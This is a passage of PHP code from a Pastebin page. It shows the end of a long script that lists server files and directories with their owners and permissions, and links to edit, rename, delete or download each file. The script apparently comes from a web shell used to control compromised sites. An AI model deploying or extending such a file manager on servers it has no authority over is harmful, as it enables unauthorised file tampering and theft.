  2817.                 echo "<td class='td_home'><center>$dtype</center></td>";
  2818.                 echo "<td class='td_home'><center>-</center></th></td>";
  2819.                 echo "<td class='td_home'><center>$dtime</center></td>";
  2820.                 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2821.                 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2822.                 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2823.                 echo "</tr>";
  2824.             }
  2825.         }
  2826.     } else {
  2827.         echo "<font color=red>can't open directory.</font>";
  2828.     }
  2829.         foreach($scandir as $file) {
  2830.             $ftype = filetype("$dir/$file");
  2831.             $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2832.             $size = filesize("$dir/$file")/1024;
  2833.             $size = round($size,3);
  2834.             if(function_exists('posix_getpwuid')) {
  2835.                 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2836.                 $fowner = $fowner['name'];
  2837.             } else {
  2838.                 //$downer = $uid;
  2839.                 $fowner = fileowner("$dir/$file");
  2840.             }
  2841.             if(function_exists('posix_getgrgid')) {
  2842.                 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2843.                 $fgrp = $fgrp['name'];
  2844.             } else {
  2845.                 $fgrp = filegroup("$dir/$file");
  2846.             }
  2847.             if($size > 1024) {
  2848.                 $size = round($size/1024,2). 'MB';
  2849.             } else {
  2850.                 $size = $size. 'KB';
  2851.             }
  2852.             if(!is_file("$dir/$file")) continue;
  2853.             echo "<tr>";
  2854.             echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2855.             echo "<td class='td_home'><center>$ftype</center></td>";
  2856.             echo "<td class='td_home'><center>$size</center></td>";
  2857.             echo "<td class='td_home'><center>$ftime</center></td>";
  2858.             echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2859.             echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2860.             echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2861.             echo "</tr>";
  2862.         }
  2863.         echo "</table>";
  2864.         if(!is_readable($dir)) {
  2865.             //
  2866.         } else {
  2867.         }
  2868. }
  2869. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top